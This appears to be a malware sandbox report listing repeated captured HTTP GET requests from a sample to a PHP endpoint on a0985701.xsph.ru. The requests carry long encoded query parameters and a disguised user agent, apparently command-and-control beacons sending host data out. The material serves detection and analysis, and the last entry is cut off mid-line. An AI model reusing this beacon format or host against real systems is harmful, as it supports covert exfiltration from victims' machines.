Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQz